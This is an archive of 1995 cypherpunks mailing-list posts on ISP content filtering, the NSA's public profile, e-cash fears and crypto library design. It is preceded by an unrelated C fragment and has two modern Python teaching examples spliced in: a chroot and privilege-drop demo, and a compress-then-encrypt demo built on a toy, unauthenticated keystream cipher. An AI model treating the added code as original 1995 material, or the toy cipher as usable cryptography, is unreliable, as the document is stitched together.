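int round_trip_ok(void)
{
    byte text[200], mid[BUFSZ], back[BUFSZ];
    size_t n = 0, m = 0;
    sample(text);
    if (run_chain(pack_then_mask, 2, text, sizeof text, mid, &n) != 0) return 0;
    if (run_chain(undo_pack_then_mask, 2, mid, n, back, &m) != 0) return 0;
    return m == sizeof text && memcmp(back, text, m) == 0;
}

int main(void)
{
    printf("pack then mask: %zu bytes\n", chained_size(pack_then_mask, 2));
    printf("mask then pack: %zu bytes\n", chained_size(mask_then_pack, 2));
    printf("round trip ok:  %d\n", round_trip_ok());
    return 0;
}
```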





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 3 Aug 95 08:49:52 PDT
To: Alex Tang <altitude@CIC.Net>
Subject: Re: building libraries
In-Reply-To: <199507311348.JAA04346@petrified.cic.net>
Message-ID: <Pine.BSD/.3.91.950803114050.12078N-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


Perhaps we could convince Bill Gates to bundle RSAREF with all his 
Windoze OS's?  Ditto for Apple?

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Thu, 3 Aug 95 11:46:57 PDT
To: cypherpunks@toad.com
Subject: Re: NYETSCAPE
Message-ID: <199508031844.LAA05026@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In a copyrighted article,
>Copyright 1995, Nathan Zook.  All rights reserved.
Nathan discusses his suggested directions for elder-controlled
filtering of kids' net access.  (Could be parents, or schoolocrats in loco.)

>The system is of necessity ISP-based.  Home-based systems are subject to
>attacks
That's probably necessary; it's certainly the efficient way.  A third approach
is Exon's "Censor the whole net, unless perverts can find ways to talk to
each other without any chance of kids hearing them", which is morally
unacceptable.
The interesting question is how much overlap develops between this and emerging
reputation/filtering services for adults, for which the filtering criteria are
interestingness-related rather than offensiveness-related.

> [ multiple rating services ]
Yep.  For market reasons, as well as moral, aesthetic, and practical ones.

>The NYET-software runs as superuser on the ISP's machine. [...]
>The parent sets the configuration file to permit and deny access to
>various parts of the net.  
And any kid who can break that dialog (e.g. by tapping the parent's session
to get the parent's password) won't be stopped by any wimpy restrictions :-)

An important consideration is that filtering has to be application-specific.
Some sites can be cut off entirely (presumably *.penthouse.com),
but most filtering needs to be more granular, and has different time-scales.
You're certainly not going to block access to the whole Library of CONgress
just because there are a few dirty book titles in the on-line card catalog.

For instance, ftp files and static web pages are pretty easy to rate and filter
if you've got a herd of adults to go surfing them.  
Dynamic web pages are tougher - do you default to open access,
closed-unless-rated, or just use a no-dirty-words-and-no-pictures blocker?

Usenet - some newsgroups obviously would get blocked, 
some would get individual articles filtered by humans,
and technical groups would probably with automatic filters to censor certain
posters and certain words, with occasional human monitoring to detect 
the occasional uses of comp.nerdy.detailed or comp.binaries.eniac for
posting pornography or whatever.  Filtering does slow down conversation,
but enough paid moderators could probably keep up.

But what about chat-programs, IRC, etc.?  You really _can't_ censor
that stuff in real-time and have a meaningful flow of conversation,
except for trivial dirty-word filters which can be exonized around.
Sure, you could have adults watching to say "Hey, cut that out down there!",
and making sure channel names don't have politically incorrect words in them.
And maybe you can have kids-only chat rooms - but what happens when
the kids either start talking like Beavis and [Exon'd]head, or
start talking about (gasp!) sex or (double-gasp!) sexual orientation?
Do you tell their mom? 

And then there are wide-open technologies like telnet (which can do 
almost anything) and email (slower, but goes everywhere) - do you
try to restrict those?  

One major technology that would be needed for this sort of application
is authentication, whether it's digital-signature-based or just
automatic packet-labelling with applications that maintain labels,
so that you can be sure who posted what within PoliticallyCorrectNet,
know whose mom to call if little FooBar has been misbehaving, whose posting
privileges to block or reading to restrict if their mom grounds them,
or, on the positive side, to encourage people to take responsibility for
their postings and remind them that this kind of service only works
if everybody agrees, up-front, to be Good Citizens.

But how do you manage this technically - require outgoing connections
to all go through proxies?  (You need firewalls anyway.)
But do you require connections from users to go through an authentication
proxy before connecting to internal destinations as well,
or is it adequate to use IPv6 with mandatory authentication and
only add proxy service where it's needed?

And what about encryption?  (And stego?  Do some of those MIDI postings have
NASTY WORDS in them if you play them BACKWARDS?  Oh, no!)
We probably need to understand the politics of this sort of service
to find a way to position encryption as a Good Thing, probably as
part of the authentication system - there's a very high risk that it'd
either be banned, or at least Clipperized with a hierarchical authentication
system.  

Of course, if you're banning encryption, or just trying to monitor what's
going on on the net, there's the language problem - English and Spanish
are a start, but it's probably hard for the average ISP to have the 
right mix of people to tell whether an IRC channel is really
speaking Finnish or Hawai'ian or Tuvan or whether it's just stego.
This is probably a Good Thing - while some services will probably
restrict the languages that people post in (either because they're
Real American monoculturalists or because they're providing a
heavily-monitored service and don't have the bucks for 5000 languages), 
others will be pushed toward encouraging responsibility instead.

>I feel it necessary to reiterate the importance of the government
>waiting for a market solution to this problem. 

Yeah!
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Crypto in 3-4 lines of perl --> http://dcs.ex.ac.uk/~aba/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com
Date: Thu, 3 Aug 95 08:48:35 PDT
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: NYET--attempted formal specs (again)
In-Reply-To: <Pine.SUN.3.91.950803104530.165A-100000@rwd.goucher.edu>
Message-ID: <Pine.SUN.3.91.950803112903.27691A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Aug 1995, Jon Lasser wrote:

> On Wed, 2 Aug 1995, Timothy C. May wrote:
> 
> > In fact, most religious groups are distrustful of "The Gubment" deciding
> > what's reasonable and what's not.
> 
> Unless, of course, at that moment they happen to BE "The Gubment."
> 
> Not always then, but sometimes.
> 
> Jon

Precisely.  *Everyone* hates the government--everyone outside of it, that
is.  Anarchist/libertarian types are often too quick to accept people or
groups as "one of us" just because they're "against the government," 
whatever that means.  Most of them are just waiting to gain power, at
which time their true agenda will become clear soon enough, if it isn't 
already.

The relevant example here is the religious fundamentalist kook Pat
Robertson, who IMHO cypherpunks are a little too quick to accept at his
word.  Robertson holds some pretty blatantly fascistic views--and this is
not hyperbole.  See for example the long piece about him in the New York
Review of Books a few months back.  A journalist friend of mine is also
working on a piece about one of Robertson's gurus--a fascist (again, no
exaggeration) from the 30's or 40's whose book Robertson quotes from on a
regular basis.  I've seen the book in question, and it's pretty strong
stuff.  When I learned about this connection I wasn't particularly
surprised. 

Personally, I don't care whether Robertson has opposed Clipper or not.  I 
won't complain, I guess, but it doesn't change my views on him.  I'm sure 
many serial killers and neo-nazis opposed Clipper too.  Fine, but it 
doesn't exactly make us best buds.

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman@CS.YALE.EDU>
Date: Thu, 3 Aug 95 09:03:46 PDT
To: cypherpunks@toad.com
Subject: Re: "Codebreakers" on PBS in NYC????
In-Reply-To: <Pine.BSD/.3.91.950803105116.12078B-100000@escape.com>
Message-ID: <Pine.SUN.3.91.950803120250.3920A-100000@frog.zoo2.cs.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


> > bart@netcom.com (Harry Bartholomew) writes:
> > 
> > >     For the Bay Area, on KQED at 8 p.m. Tuesday. The NOVA show
> > >     "The World War II codebreaking efforts known as Enigma and Purple"
> > 
> > If this is the rerun of the show Nova had in march 94, then I highly
> > recommend it.  I taped it and showed it to the undergrad class on computer
> > security I taught that semester.  The kids loved it.

Is there anyone out there that can copy this for me?  I'd be glad to mail 
you an extra VHS tape for your effort.

BEn.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 3 Aug 95 09:23:12 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Noise: PBS under the Republicans (fwd)
Message-ID: <Pine.BSD/.3.91.950803121435.12078o-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain



Date: Sun, 30 Jul 1995 11:09:47 -0400
From: Sal Denaro <Sal@panix.com>
To: sunder@escape.com
Subject: PBS under the Republicans 

// Ray, you may want to forward this to the list.

  --------------------------------
A TYPICAL DAILY PBS SCHEDULE IF THE PUBLIC BROADCASTING LEADERS CAVE IN
TO REPUBLICAN PRESSURE

8:00 am  Morning Stretch:  Arnold Schwarzenegger does squats while
reciting passages of "Atlas Shrugged."

9:00 am  Mr. Rogers' Segregated Neighborhood:  King Friday sings
"Elitism is neat."  The House Un-American Activities investigation of
Mr. McFeely continues.  Mr. Rogers explains why certain kids can't be
his neighbor.

10:00 am  Sesame Street:  Jerry Falwell teaches Big Bird to be more
judgemental.  Oscar the Grouch plays substitute for Rush Limbaugh.  Bert
and Ernie are kicked out of the military.  Jesse Helms bleaches all the
Muppets white.

11:00 am  Square One:  A MathNet episode "Ernest Does Trickle-Down."
Jim Varney explains how cutting taxes for the rich and spending more on
defense will balance the budget.

Noon  Washington Week in Review:  Special guest Senator Bob Dole,
explaining why the current pension crisis, budget deficit, bank
closings, farm foreclosures, S & L bailouts, inflation, recession, job
loss, and trade deficit can all be blamed on someone else.

1:00 pm  Where in the world is Carmen San Diego?  Guest detective Pat
Buchanan helps kids build a wall around the U.S.

2:00 pm William F. Buckley's Firing Line:  Guests George Will, Rush
Limbaugh, John Sununu, Pat Buchanan, James Kilpatrick, Mona Charen, G.
Gordon Liddy, Robert Novak, Bay Buchanan, Pat Robertson, Joseph Sobran,
Paul Harvey, Phyllis Schlafly, Maureen Reagan, and John McLaughlin bemoan
the need for more conservative media voices.

3:00 pm  Nature:  Join James Watt and Charlton Heston as they use
machine guns to bag endangered species.

4:00 pm  NOVA:  "Creationism:  Discredited, but what the hell?"

5:00 pm  Newt Gingrich News Hour:  Clarence Thomas and Bob Packwood
present in-depth personal reports on sexual harassment.  Pat Buchanan
says he is being shut out from national exposure.

6:00 pm  Mystery Theater:  Hercule Poirot, Jane Marple, and Sherlock
Holmes team up to investigate Whitewater.

7:00 pm  Great Performances:  Pat Buchanan is a guest conductor of
Wagner's "Prelude to a Cultural War."

8:00 pm  Masterpiece Theater:  Ibsen's "A Doll's House."  Phyllis
Schlafly adds to this classic with an added scene where Nora gladly gives
up her independence while her husband chains her to the stove.

9:30 pm  Washington Week in Review:  Guests George Will, Rush Limbaugh,
John Sununu, Pat Buchanan, James Kilpatrick, Mona Charen, G. Gordon
Liddy, Robert Novak, Bay Buchanan, Pat Robertson, Joseph Sobran, Paul
Harvey, Phyllis Schlafly, Maureen Reagan, and John McLaughlin discuss
liberal media bias.

10:00 pm  Adam Smith's Money World:  How to Profit from Ozone Depletion

10:30 pm   Nightly Business Report:  Wall Street celebrates the end of
all laws regarding antitrust, consumer protection, work-place safety,
environmental protection, minimum wage and child labor.

11:00 pm  Insights of Dan Quayle

11:01 pm Sign-Off








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 3 Aug 95 09:37:01 PDT
To: Ray Arachelian <sunder@escape.com>
Subject: Re: Noise: PBS under the Republicans (fwd)
In-Reply-To: <Pine.BSD/.3.91.950803121435.12078o-100000@escape.com>
Message-ID: <199508031636.MAA00571@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



What, exactly, does this have to do with cryptography?

.pm

Ray Arachelian writes:
> Date: Sun, 30 Jul 1995 11:09:47 -0400
> From: Sal Denaro <Sal@panix.com>
> To: sunder@escape.com
> Subject: PBS under the Republicans 
> 
> // Ray, you may want to forward this to the list.
> 
>   --------------------------------
> A TYPICAL DAILY PBS SCHEDULE IF THE PUBLIC BROADCASTING LEADERS CAVE IN
> TO REPUBLICAN PRESSURE




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Thu, 3 Aug 95 10:10:16 PDT
To: cypherpunks@toad.com
Subject: Re: There's a hole in your crypto...
In-Reply-To: <199508021251.IAA08192@detroit.freenet.org>
Message-ID: <199508031709.NAA29005@colon.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


Nathan Zook writes:
 > > And is there any way to build trusted system out of small, verifiable
 > > pieces?  Since the way they're connected could also be questioned, I
 > > suspect that when you put enough of them together it's just as bad as
 > > the case of a single, monolithic program.  But this isn't my area, so
 > > I don't know.
 > 
 > No.  This was essentially proved during the first third of this century.

Well, I haven't gotten a reply from Nathan Zook on this assertion, so
can anyone else back it up with some references? Perhaps we're
discussing different contexts, but proving correct systems composed of
correct components is still a subject of active research.

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 3 Aug 95 10:46:15 PDT
To: cypherpunks@toad.com
Subject: EU Data Protection
Message-ID: <199508031725.NAA27264@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Could I bother the members of this list with a request that anyone who has a
copy of (this week's or a recent) Computerworld, look and see if I'm quoted
in an article by Mitch Betts on the European Union's humorous decree on
Euro-wide data protection.  I was interviewed last Thursday.  The decree
(July 24th) threatens to cut off data flows to any nation that doesn't adopt
Eurosclerotic data protection standards.  It will be quite humorous when
their Visa and ATM authentications start to fail.

DCF

"Member of the "unorganized militia of the US" who was going to make it to
Waco in '93 but couldn't afford the 5,000 gallons of fuel for the turbine of
his M1A1."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Thu, 3 Aug 95 11:33:59 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: NYET--attempted formal specs (again)
In-Reply-To: <9508030905.AA15886@cs.umass.edu>
Message-ID: <Pine.3.89.9508031320.B15462-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 3 Aug 1995, Futplex wrote:

> Nathan Zook writes:
> > The NYET-software runs as superuser on the ISP's machine.  All minor
> > accounts have a corresponding configuration file sitting in their
> > account owner's parent's directory, which is locked with read/write by
> > owner only flags.  The correspondence between minor and parent
> > accounts sits in a file owned by root and similarly locked.
> 
> Just a minor technical comment:
> Based on my rather limited experience lurking on the firewalls list, I
> believe the preferred security-conscious method of running such daemons
> involves _not_ giving them su/root privileges.  Dr. FBC's thttp, for example,
> runs as a user named, e.g., "www" with pretty ordinary privileges. They are
> also often run in a chroot()ed "jail", so that the process can't see any
> directories outside the tree artificially rooted in its home directory. You'd
> then need some mechanism for the `rents to submit configuration updates to
> the imprisoned daemon, I suppose.  Perhaps digitally-signed email....
> 
> -Futplex <futplex@pseudonym.com>
> "Before you started tokin' you used to have a brain, but now you don't get
> even the simplest of things...." -Offspring
> 

I bow before superior wisdom, such as this....

Nathan
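
The arrangement Futplex describes in the quoted text (no root for the daemon, plus a chroot() jail), as an added example that is not part of the thread or of any NYET code. The uid/gid 65534, the file name `daemon.conf` and all function names are assumptions made for the illustration.

```python
import os
import tempfile

# Assumption: 65534 is the conventional "nobody" uid/gid. A real deployment
# would use a dedicated account (the "www" of the post) looked up by name.
UNPRIV_UID = 65534
UNPRIV_GID = 65534

# Outcomes reported by the jailed child through its exit status.
JAILED, NOT_PERMITTED, STILL_PRIVILEGED = 0, 3, 4

CONFIG_NAME = "daemon.conf"   # hypothetical file the jailed daemon may read


def make_jail():
    """Create a constructed, minimal jail directory holding one config file."""
    jail = tempfile.mkdtemp(prefix="jail-")
    os.chmod(jail, 0o755)     # the unprivileged uid must be able to search it
    with open(os.path.join(jail, CONFIG_NAME), "w") as fh:
        fh.write("filter=on\n")
    return jail


def enter_jail(jail_dir, uid, gid):
    """Confine this process to jail_dir, then give up root for good.

    Order matters: chroot() and setgroups() need root, so they come first.
    setuid() comes last because nothing privileged can be done after it.
    A chroot alone does not hold a process that is still root.
    """
    os.chroot(jail_dir)
    os.chdir("/")        # otherwise the working directory stays outside the jail
    os.setgroups([])     # drop supplementary groups inherited from root
    os.setgid(gid)       # group before user: setgid() fails once uid != 0
    os.setuid(uid)       # as root this sets the real, effective and saved uid


def privileges_are_gone():
    """Return True if the process can no longer regain root or chroot again."""
    for attempt in (lambda: os.setuid(0),
                    lambda: os.setgid(0),
                    lambda: os.chroot("/")):
        try:
            attempt()
        except PermissionError:
            continue     # refused, which is what we want
        return False     # one of the calls succeeded: the drop was incomplete
    return True


def run_jailed(jail_dir, uid=UNPRIV_UID, gid=UNPRIV_GID):
    """Fork, jail the child, and return JAILED, NOT_PERMITTED or STILL_PRIVILEGED."""
    pid = os.fork()
    if pid == 0:                      # child: the daemon would run here
        code = STILL_PRIVILEGED
        try:
            enter_jail(jail_dir, uid, gid)
            sees_only_jail = (os.path.exists("/" + CONFIG_NAME)
                              and not os.path.exists("/etc"))
            if sees_only_jail and privileges_are_gone():
                code = JAILED
        except OSError:               # not started as root, or the kernel refused
            code = NOT_PERMITTED
        finally:
            os._exit(code)            # never fall back into the parent's code
    _, status = os.waitpid(pid, 0)
    return os.WEXITSTATUS(status) if os.WIFEXITED(status) else STILL_PRIVILEGED


if __name__ == "__main__":
    names = {JAILED: "jailed and unprivileged",
             NOT_PERMITTED: "not permitted (start the launcher as root)",
             STILL_PRIVILEGED: "jail entered but privileges remain"}
    print(names[run_jailed(make_jail())])
```

The launcher still has to start as root, because chroot() itself is privileged; the point is that the long-running code holds no privilege by the time it handles input.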





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 3 Aug 95 13:44:22 PDT
To: Childers James <liberty@gate.net>
Subject: NSA, NRO, and Keeping Secrets
Message-ID: <ac4682bd00021004c387@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:50 PM 8/3/95, Childers James wrote:

>I'm afraid I don't follow. Are you saying that the NSA is assuming a more
>public role because (apparently) strong crypto is now widely available to
>the public? I don't see the connection between A and B if this is what
>you are claiming.
>
>Unless they're gearing up for a PR campaign... I wonder how the NSA has
>been portrayed in Hollywood in the past. I've just seen them mentioned in
>one movie I can think about ("Crimson Tide"). Anyone else know of references?

The NSA has been mentioned in many recent movies, even in television shows
(like "The X Files"). I haven't been keeping a list, but the last Clancy
movie, "A Clear and Present Danger," had references. And in more than one
movie the reference to "NSA agents" doing various things is made.

The NSA has a high profile today. "No Such Agency" is clearly marked as an
exit on the Baltimore-Washington highway, and of course even has a museum
open to the public.

Even the National Reconnaissance Organization is public knowledge, partly
because of the Burrows book "Deep Black," and partly because of the
controversy over the huge building out near Dulles Airport.

Some things are mostly secret, though. The cover of Consular Operations was
almost blown some years back by former agent Ludlum, but ConsOps has faded
back into obscurity.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 3 Aug 95 11:22:19 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: Object Oriented Crypto API
In-Reply-To: <199508031625.JAA11761@jobe.shell.portal.com>
Message-ID: <199508031821.OAA05692@bwnmr5.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| I enjoyed Ray's message about the crypto library interface.  I haven't
| had time to study it closely, but I have a couple of quick comments:

	I thought it was very well done as well, with one omission,
other than the one Hal noted.  There should be a compress function,
because messages should be compressed before encryption takes place.

	Giving the library a zip() call also makes it possible to
suggest the library in more circumstances.  When people ask 'where can
I snarf some compression code?' we can point them to a library that
does strong crypto as well.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume
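
Why the order in Adam's message matters, as an added example that is not part of the thread or of the library under discussion: ciphertext looks random, so compression only pays off when it runs before encryption. The SHAKE-256 keystream is a stand-in cipher (unauthenticated, demo only) chosen so the block runs on the standard library; `seal`, `unseal`, the key and the sample message are assumptions.

```python
import hashlib
import os
import zlib

NONCE_LEN = 16
KEY = b"constructed demo key, not a real secret"
# Constructed sample input: repetitive text, as ordinary mail tends to be.
MESSAGE = b"Meet at the usual place at noon. Bring the key fingerprints.\n" * 40


def _keystream_xor(key, nonce, data):
    """XOR data with a SHAKE-256 keystream (stand-in for a real cipher)."""
    stream = hashlib.shake_256(key + nonce).digest(len(data))
    return bytes(a ^ b for a, b in zip(data, stream))


def encrypt(key, plaintext):
    """Encrypt under a fresh random nonce so the keystream is never reused."""
    nonce = os.urandom(NONCE_LEN)
    return nonce + _keystream_xor(key, nonce, plaintext)


def decrypt(key, blob):
    nonce, body = blob[:NONCE_LEN], blob[NONCE_LEN:]
    return _keystream_xor(key, nonce, body)


def seal(key, message):
    """Compress first, then encrypt: the order the message asks for."""
    return encrypt(key, zlib.compress(message, 9))


def unseal(key, blob):
    """Undo seal(): decrypt, then decompress."""
    return zlib.decompress(decrypt(key, blob))


def encrypt_then_compress(key, message):
    """The wrong order: zlib finds no redundancy left in the ciphertext."""
    return zlib.compress(encrypt(key, message), 9)


def size_report(key, message):
    """Return the byte counts for both orderings next to the plaintext size."""
    return {
        "plaintext": len(message),
        "compress_then_encrypt": len(seal(key, message)),
        "encrypt_then_compress": len(encrypt_then_compress(key, message)),
    }


def length_leak(key):
    """Sealed sizes of two constructed 200-byte plaintexts.

    Compression makes the ciphertext length depend on the content, so an
    observer who sees only lengths can tell these two messages apart.
    """
    repetitive = b"yes " * 50          # 200 bytes, highly redundant
    varied = bytes(range(200))         # 200 bytes, no repeats
    return len(seal(key, repetitive)), len(seal(key, varied))


if __name__ == "__main__":
    for name, size in size_report(KEY, MESSAGE).items():
        print(f"{name:24s} {size:6d} bytes")
    print("equal-length plaintexts seal to", length_leak(KEY), "bytes")
```

The last line of output is the caveat that comes with the advice: once compression runs first, ciphertext length reflects how redundant the plaintext was.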




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Weisberger <jweis@primenet.com>
Date: Thu, 3 Aug 95 14:41:13 PDT
To: cypherpunks@toad.com
Subject: SSLeay - Whats the story...
Message-ID: <199508032140.OAA09085@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text


Maybe I miss it, but when did this arrive?  Is anyone testing it?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <zeus@pinsight.com>
Date: Thu, 3 Aug 95 14:47:04 PDT
To: "cypherpunks@toad.com>
Subject: 900# "Mind Your 0wn Business"
Message-ID: <199508032146.OAA15372@utopia.pinsight.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --

Howdy, y'all:

Remember when I said we should establish 900#s to sell
privacy information? Here's my attempt:

-----BEGIN PGP SIGNED MESSAGE-----

  ANNOUNCING: The "MIND YOUR 0WN BUSINESS" audiotext program. 
       1 - 9 0 0 - C A N - M Y 0 B  (1-900-226-6902)
           Note the zero digit, not the letter "O."

The Feds say you can't have privacy, but we say you CAN "Mind 
Your 0wn Business!" And now we have a 900 number to reveal new 
methods to defend your privacy from criminals and tyrants.

Sponsored by The Agorist Institute.

The cost of each call is just 99 cents per minute, average cost 
$2.97, average length 3 minutes. You must be at least 18 to call 
or have parental permission. (The total cost is less than what 
you'd be charged per minute on most psychic or sex lines).

The line will be updated by the 1st of each month. By September 
1, 1995, our message will be recorded by a professional audio 
producer, but for now, you get to hear me read the first script. 
Don't be surprised if we update it during August.

  Kent

J. Kent Hastings, Assistant Director of The Agorist Institute
zeus@pinsight.com -- http://www.pinsight.com/~zeus/agorist/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMCE9ijTxxI221vktAQH9uQP+PmeMh8fAp6xFumDMnAE21GtWEq6eAtyd
YnQAAxsFrX6xOFFiZI9F7RSe5l82RzwcxFilh3U572bmWnfqq/lGmki/EcZOvOfV
EwY6Uxn59jxHeKzL/qYS0CgqmcIYfKWczDQdXahFStDu6nKFAMqYUMTr6Y4POEcp
/lZGVdkseD0=
=Q/hE
-----END PGP SIGNATURE-----

It's rough now, but should become more useful in the next few months.

Kent
--
"Put pages for your business on the World Wide Web, just $5 per month!"
J. Kent Hastings -- zeus@pinsight.com -- http://www.pinsight.com/~zeus/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Childers James <ic58@jove.acs.unt.edu>
Date: Thu, 3 Aug 95 12:48:31 PDT
To: "K. M. Ellis" <kelli@zeus.towson.edu>
Subject: Re: Pat Robertson Fears E-cash?
In-Reply-To: <Pine.ULT.3.91.950803144027.15377B-100000@zeus.towson.edu>
Message-ID: <Pine.SOL.3.91.950803144149.17899A-100000@jove.acs.unt.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Aug 1995, K. M. Ellis wrote:

> On Wed, 2 Aug 1995, Peter Trei wrote:
> 
> > The relevant verses are in Revelations 13, where some of the actions
> > by which The Beast can be recognized are given. Among them are:
> > [Deletia]
> > 
> > E-cash is a bit of a reach from this, but some of them (eg, 
> > Robertson), extend the verses to cover all forms of trackable 
> > transactions. I suspect that if someone could get him to realize the 
> > privacy aspects of true anonymous ecash, he'd like it.

> I read in the New York Times that a lot of fundamentalist Christians fear 
> the e-cash revolution because they believe that eventually everyone will 
> be required to bear a tattooed bar code on their right hand which 
> would contain all a person's information:  name, d.o.b., birthplace, 
> etc.  

Crapola. They fear the unknown, and read their own personal prejudices 
and beliefs into something they don't understand. Maybe I'll start going 
to church <shudder> and explain to the believers about the benefits of 
crypto *against* such Revalationary measures. I'm sure they would be 
interested in the work Chaum has done regarding truly anonymous 
transactions.

Hell, maybe we could set up a Dining Christians net.

"Freedom is meaningless unless  | ic58@jove.acs.unt.edu - James Childers
 you can give to those with whom| No man's freedom is safe
 you disagree." - Jefferson     |    while Congress is in session
        EA 73 53 12 4E 08 27 6C   21 64 28 51 92 0E 7C F7





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Thu, 3 Aug 95 11:46:14 PDT
To: Peter Trei <trei@toad.com>
Subject: Re: Pat Robertson Fears E-cash?
In-Reply-To: <9508021741.AA05602@toad.com>
Message-ID: <Pine.ULT.3.91.950803144027.15377B-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 2 Aug 1995, Peter Trei wrote:

> The relevant verses are in Revelations 13, where some of the actions
> by which The Beast can be recognized are given. Among them are:
> 
> 16 And he causeth all, both small and great, rich and poor, free and 
>    bond, to receive a mark in their right hand, or in their foreheads: 
> 17 And that no man might buy or sell, save he that had the mark, or 
>    the name of the beast, or the number of his name.
> 
> Millennialist Christians tend to regard this as a method by which 
> the faithful will be shut out of the economy, since the pious will
> refuse such a 'mark'.
> 
> E-cash is a bit of a reach from this, but some of them (eg, 
> Robertson), extend the verses to cover all forms of trackable 
> transactions. I suspect that if someone could get him to realize the 
> privacy aspects of true anonymous ecash, he'd like it.
> 
> 

I read in the New York Times that a lot of fundamentalist Christians fear 
the e-cash revolution because they believe that eventually everyone will 
be required to bear a tattooed bar code on their right hand which 
would contain all a person's information:  name, d.o.b., birthplace, 
etc.  Such a tattoo would also be used to deduct e-cash from a person's 
"account" when they made purchases.  It's still a bit of a stretch; 
they're using the book of Revelations to back up this theory.

kelli@zeus.towson.edu              http://zeus.towson.edu/~kelli/
GAT d? H+ s+++:-- !g p? !au a- w++@ !v@ c++++ UL++ P+ L+ 3 E---- N+ K W--- 
M-- V-- po- Y++ t+ 5-- jx R G'''' tv- b+++ D-- B e+ u** h* f++ r--- n+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu
BigBrotherSystemsBBS........BigBrotherIsWatchingYou.......(410)494-3253#11





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Childers James <ic58@jove.acs.unt.edu>
Date: Thu, 3 Aug 95 12:53:23 PDT
To: Jim Ray <liberty@gate.net>
Subject: Re: There's a hole in your crypto...
In-Reply-To: <199508031918.PAA16067@bb.hks.net>
Message-ID: <Pine.SOL.3.91.950803144627.17899B-100000@jove.acs.unt.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Aug 1995, Jim Ray wrote:

> >Doesn't the NSA certify the security of cryptosystems?
> >I wonder what they'd say about PGP?
> 
> Their consultant, Prof. Dorothy Demming(sp?), has been asked this very
> question about PGP, and she deftly avoided comment on both PGP and IDEA.
> [I believe this was on NPR, but I'm not certain.] The emergence of NSA
> from absolutely secret agency to semi-public status (writing letters,
> P.R. concerns, opening a museum, etc.) at the same time as the general 
> availability of what's considered by many [including me] to be strong, 
> free, cryptography "for the masses" is interpreted by many [including me]
> as an implicit NSA comment on the availability of strong crypto in 
> general, and on the availability of PGP in particular.

I'm afraid I don't follow. Are you saying that the NSA is assuming a more 
public role because (apparently) strong crypto is now widely available to 
